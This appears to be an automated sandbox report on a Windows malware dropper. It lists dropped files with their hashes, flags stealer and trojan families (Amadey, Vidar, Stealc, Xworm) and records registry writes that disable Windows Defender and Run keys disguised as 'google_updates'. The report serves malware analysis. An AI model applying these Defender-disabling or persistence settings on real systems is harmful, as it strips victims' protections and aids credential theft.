C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\ac081f8f-04b0-45e0-9aac-e25e18c2e726

MD5 fda8d62c900d4eff4da53af4e0f43645
SHA1 c5b541077a678923978a2d33a6e7dcb6f7e3d101
SHA256 c4508a44ccc677828dbd163ad8f1aa9bb2fed8ed9a86ff69fc3b718cb69f3db0
SHA512 cc0065aec78e041a67e1973add7f87a383c253a96e523022dbff9ad9a71d921c2d6f168adc50bbb992c39ecb288904997ac161b05fdd6fc12fe6f1f5831c53e4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 a6d069317fac86dcea089645da03a774
SHA1 e3873b7e7c8256dba2a5c0ef73299fa3d6e10739
SHA256 b2ec2cf9504c6a1295211e3904f310ccc34199b1654189f9a5f74e179dad1e16
SHA512 da5166d1a9db655b2dddbfc7b8e8a8620c1932b4e7daa376d1e0a265270bc01d4fcb936c1070be21c924f3cfc9bd60acb5fc4225efbd249f9bf9a259fd3fe536

memory/2668-731-0x0000000006940000-0x0000000006FD7000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 ae7c305a3c228d3cc12291c8adf2bfc4
SHA1 d88fb4c63a5c1eadc05c53a5f4fc78d463c482ab
SHA256 6364157ebedd296ceba1aebda06ede3524fed90fec7551cc656d92a7d578e79d
SHA512 b54eb3d473651257faecbe0a28be7472b280b780d13aff61205c587ced20654580cc9ece95f3c2b4b71cd31b9e8d8083f8840bdb642f2e4ef8aac9e3f10765b7

memory/2844-791-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe

MD5 e787e8998f5306a754d625d7e29bbeb5
SHA1 14e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA256 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA512 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

memory/2668-790-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 13410ed1ef0840b0db333ebe922d6454
SHA1 1e5a1ebc1bed46375f1cde5e09a8019f548ae8ae
SHA256 6271a6772f0cfad840b5459c6c2f8da0c7846f4349bef8111cf934ce5b4c3a35
SHA512 8dc0c0d2e068edc9806a86f9caa7c0bfc9bd4d592c7a525cc900ab70221eb744c2653ff54e65aa0678fdcfbeb2c39af37eabca55d76b7c29a9f4587cb90059cd

memory/3640-824-0x0000000000EC0000-0x0000000001332000-memory.dmp

memory/3640-830-0x0000000000EC0000-0x0000000001332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe

MD5 745e4bcf3d176ea5e82a7c26a6733757
SHA1 499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA256 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512 bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

memory/2844-862-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2668-861-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/3240-873-0x0000000000B80000-0x0000000000B90000-memory.dmp

memory/3640-872-0x0000000000EC0000-0x0000000001332000-memory.dmp

memory/2800-886-0x00000000009A0000-0x00000000009B0000-memory.dmp

memory/3632-891-0x0000000000380000-0x0000000000689000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0e8d437c8951e606b3221594a9993bdc
SHA1 8fa7d6483c0890e44c293d457cbf4b94045a5d59
SHA256 56f571a7f447bd0b41c37d42479758481632de0cb2a33eadae1d0f4986c0b7c4
SHA512 1db3048ae9444e855d0be53aea7ce40ee6e6e75561b7922409d0f9e44219487f6dcb10c0b239918625e1eeb58f5b93162c05e7b21082fc0bbe0cc19b8410ea8b

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:28

Reported

2025-03-05 22:30

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\Oar936gK\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c29c440560.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\c29c440560.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
